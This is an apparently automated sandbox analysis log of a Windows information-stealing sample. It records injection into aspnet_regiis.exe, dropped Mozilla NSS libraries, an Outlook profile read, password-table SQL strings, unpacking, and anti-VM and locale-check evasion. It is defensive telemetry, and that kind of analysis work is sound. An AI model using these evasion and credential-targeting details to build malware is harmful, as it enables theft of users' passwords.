Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: AFIIEBGCAAECBGCBGCBK.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	ReversingLabs: Detection: 37%
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Virustotal: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe "C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe"
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Unpacked PE file: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.750000.0.unpack A7B&<U:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02766230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_02766230

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Static PE information: section name: A7B&<U
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Static PE information: section name:
Source: freebl3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.2.dr	Static PE information: section name: .didat
Source: nss3.dll.2.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_0077AF75 push edi; ret	0_2_0077AF98
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC2F06C pushad ; ret	0_2_6CC2F06D
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC2F1D2 pushad ; ret	0_2_6CC2F1D3
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC35B94 push ecx; ret	0_2_6CC35BA7
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC53AB5 push ecx; ret	0_2_6CC53AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027676B5 push ecx; ret	2_2_027676C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2DB536 push ecx; ret	2_2_6C2DB549

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: section name: A7B&<U entropy: 7.998974089724877

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	File created: C:\Users\user\AppData\Roaming\d3d9.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

2_2_02766230

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe PID: 7520, type: MEMORYSTR

Found evasive API chain (may stop execution after checking locale)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_2-75800

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 28E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 2B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 5140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 6140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 6270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 7270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 76C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 86C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Memory allocated: 96C0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\d3d9.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

API coverage: 6.4 %

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe TID: 7572

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	2_2_0275B610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0275DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02761B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_02761B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02762570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_02762570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0275D1C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027515C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_027515C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_02761650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,PR_IsNetAddrType,FindNextFileA,FindClose,	2_2_02761650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_0275D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0275D540
